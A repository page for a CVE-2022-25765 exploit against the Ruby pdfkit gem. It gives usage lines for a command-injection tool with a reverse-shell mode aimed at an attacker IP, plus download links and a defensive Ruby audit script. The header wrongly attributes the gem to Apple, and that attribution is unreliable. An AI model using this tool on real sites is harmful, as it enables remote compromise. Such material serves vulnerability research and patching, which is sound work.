
CVE-2022-25765 PoC — Apple PDFKit Security Vulnerability

Associated Vulnerability
Title: Apple PDFKit Security Vulnerability (CVE-2022-25765)
Description: Apple PDFKit is a PDF document generation component from Apple (US). Apple PDFKit has a security vulnerability that attackers can exploit to execute arbitrary commands.
Description
Exploit for CVE-2022-25765 (pdfkit) - Command Injection
Readme
# Exploit for CVE-2022-25765 (pdfkit) - Command Injection

![GitHub CVE Cover](https://user-images.githubusercontent.com/23003787/219503380-083bd0fc-80e0-4d99-8f38-06c065aaa2d0.png)

**Like this repo? Give us a ⭐!**

*For educational and authorized security research purposes only.*

## Exploit Author

[@UNICORDev](https://unicord.dev) (by [@NicPWNs](https://github.com/NicPWNs) and [@Dev-Yeoj](https://github.com/Dev-Yeoj))

## Vulnerability Description

All versions of the package pdfkit from 0.0.0 up to the fix are vulnerable to command injection because the URL passed to it is not properly sanitized.

## Exploit Description

The Ruby gem `pdfkit` is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) can be passed a specially crafted URL containing a command that will be executed. This exploit generates such URLs or sends them to a vulnerable website running `pdfkit`.
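As an added defender-side example (not part of the UNICORDev repository or of the pdfkit gem itself), the following Ruby script shows two checks a team running `pdfkit` can apply: flagging a `Gemfile.lock` that pins a version below the 0.8.7.2 fix named in this README, and allow-list validation of any user-supplied URL before it is handed to the converter. The lockfile text and URLs are constructed samples, and the allow-list pattern is this example's own choice rather than the gem's fix.

```ruby
require "uri"

# Release in which the README says the injection was fixed; anything older is affected.
PDFKIT_FIXED_VERSION = Gem::Version.new("0.8.7.2")

# Constructed sample of a Gemfile.lock pinning the version the README was tested on.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      pdfkit (0.8.6)
      mini_mime (1.1.2)

  PLATFORMS
    ruby

  DEPENDENCIES
    pdfkit
LOCK

# Returns the pinned pdfkit version from Gemfile.lock text, or nil if the gem is absent.
# Bundler writes spec entries indented by exactly four spaces under "specs:".
def pdfkit_version_from_lockfile(lock_text)
  match = lock_text.match(/^ {4}pdfkit \(([^)]+)\)$/)
  match && match[1]
end

# True when the pinned version sorts below the fixed release.
def pdfkit_vulnerable?(version_string)
  return false if version_string.nil?
  Gem::Version.new(version_string) < PDFKIT_FIXED_VERSION
end

# Allow-list for URLs accepted from users before they reach pdfkit: absolute http(s) only,
# a plain host, and a path/query character set that excludes whitespace, quotes and
# shell metacharacters outright. (This pattern is the example's own choice, not the gem's.)
SAFE_URL = %r{\Ahttps?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~\-/%?=&+]*)?\z}

def safe_pdfkit_url?(candidate)
  return false unless candidate.is_a?(String) && candidate.match?(SAFE_URL)
  uri = URI.parse(candidate)
  %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

# Audit helper: report the pinned version, whether it is in the affected range,
# and which of the supplied URLs fail the allow-list.
def audit(lock_text, urls)
  version = pdfkit_version_from_lockfile(lock_text)
  {
    pdfkit_version: version,
    vulnerable_version: pdfkit_vulnerable?(version),
    rejected_urls: urls.reject { |u| safe_pdfkit_url?(u) }
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: one clean URL and three that must be rejected.
  result = audit(SAMPLE_LOCKFILE, [
    "https://example.com/reports/2023?id=42",
    "https://example.com/a b",
    "ftp://example.com/report",
    "https://example.com/report;extra"
  ])
  puts "pdfkit #{result[:pdfkit_version]} vulnerable? #{result[:vulnerable_version]}"
  result[:rejected_urls].each { |u| puts "rejected: #{u}" }
end
```

Run it with `ruby audit_pdfkit.rb`; in a real deployment the lockfile check belongs in CI and `safe_pdfkit_url?` in the request handler that builds the `PDFKit.new(url)` call, so that upgrading to 0.8.7.2 or later is backed by input validation rather than being the only control.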

## Usage

```bash
python3 exploit-CVE-2022-25765.py -c <command>
python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022-25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022-25765.py -h
```

## Options

```
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.
```

## Download

[Download exploit-CVE-2022-25765.py from GitHub](https://raw.githubusercontent.com/UNICORDev/exploit-CVE-2022-25765/main/exploit-CVE-2022-25765.py)

[Download exploit-CVE-2022-25765.py from ExploitDB](https://www.exploit-db.com/exploits/51293)

### Searchsploit (ExploitDB)

```bash
searchsploit -u
searchsploit -m 51293
```

## Exploit Requirements

- python3
- python3:requests
- python3:urllib3

## Demo

### Custom Command Mode

![cropped command](https://user-images.githubusercontent.com/23003787/221307314-3af99159-2768-4195-b51b-8279cc436a35.gif)

### Reverse Shell Sent to Target Website Mode

![exploit-CVE-2022-25765](https://user-images.githubusercontent.com/23003787/221304847-8d5cafaa-246a-432c-9301-f21271f6d607.gif)

## Tested On

pdfkit Version 0.8.6

## Applies To

pdfkit Versions < 0.8.7.2

## Test Environment

```bash
gem install pdfkit -v 0.8.6
```

## Credits

- https://nvd.nist.gov/vuln/detail/CVE-2022-25765
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
- https://app.hackthebox.com/machines/Precious
- https://www.exploit-db.com/exploits/51293
File Snapshot

```
/data/pocs/1d4acaeb4c6114bbd0884a5ffb96c31385441550
├── Dockerfile                  (241 B)
├── exploit-CVE-2022-25765.py   (7.7K)
├── README.md                   (2.7K)
└── requirements.txt            (153 B)

0 directories, 4 files
```